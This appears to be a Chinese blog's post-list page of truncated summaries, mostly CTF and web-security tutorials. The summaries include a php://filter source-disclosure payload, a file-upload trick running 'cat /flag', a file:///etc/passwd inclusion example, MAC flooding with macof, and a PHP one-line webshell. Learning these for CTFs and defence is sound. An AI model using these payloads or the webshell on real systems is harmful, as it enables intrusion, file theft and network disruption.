limo亮少

摘要： 代码如下 1 import os 2 import requests 3 #api地址 4 url = "https://api.gmit.vip/Api/DmImg?format=image" 5 #root后面是图片下载后保存路径，如果是win就得加上盘符 6 root = "/Volumes/ 阅读全文

摘要： /?p=php://filter/convert.base64-encode/resource=flag filter是php中独有的一种协议，其作用是过滤php中的数据流 而convert.base64-encode是将数据流转义魏base64的格式 resource=<要过滤的数据流> 获得一串 阅读全文

摘要： 得到题目并查看源代码 上传的文件只支持.jpg.png格式 并且在备注中提到，如果你上传一个文件，则会执行这个Python程序，并把执行结果返回给你 所以我们编辑txt文件，并输入以下代码 import os os.system('cat /flag') 并将文件后缀改为.jpg以上传这个文件，最后 阅读全文

摘要： simple_php 题目描述： 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 1 <?php 2 show_source(__FILE__); 3 include("config.php"); 4 $a = @$_GET['a']; 5 $b = @$_GET['b']; 6 阅读全文

摘要： 可参考:点击这查看 buu上面一道题 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') " 阅读全文

摘要： file://# 作用： 用于访问文件（绝对路径、相对路径、网络路径） 示例： http://www.xx.com?file=file:///etc/passswd php://# 作用： 访问输入输出流 1. php://filter 作用： 读取源代码并进行base64编码输出 示例： http 阅读全文

摘要： 实施 Mac 泛洪攻击使用的工具是 kali 系统自带的macof，可发送大量伪造的Mac 地址的数据包 在 Kali 终端中直接执行命令macof，开始向交换机发送大量伪造的 Mac 数据包： 如果找不命令请点击这个链接查看安装教程 >>> https://www.cnblogs.com/lian 阅读全文

摘要： 本质 ： 上传一句话木马<?php echo shell_exec($_GET[‘cmd‘]);?>windows平台中国菜刀支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀使用方法：往目标web服务器上传相应的一句话木马asp一句话木马： <%execu 阅读全文

摘要： 安装macofmacof是Dsniff套装工具集的成员，主要用于在具有MAC地址的本地网络上泛洪交换机。这样做的原因是交换机调节其端口之间的数据流。它主动监视（缓存）每个端口上的MAC地址，这有助于它仅将数据传递到其预期目标。这是交换机和集线器之间的主要区别。集线器没有映射，因此将线路数据广播到设备 阅读全文

摘要： 原因:没有WX模块。需要手动下载。 手动下载，在CMD中输入指令：pip install -U wxPython。下载成功即可。在运行python则可正常运行。 1. 下载pip 地址：https://pypi.python.org/pypi/pip#downloads 注意选择tar.gz压缩包， 阅读全文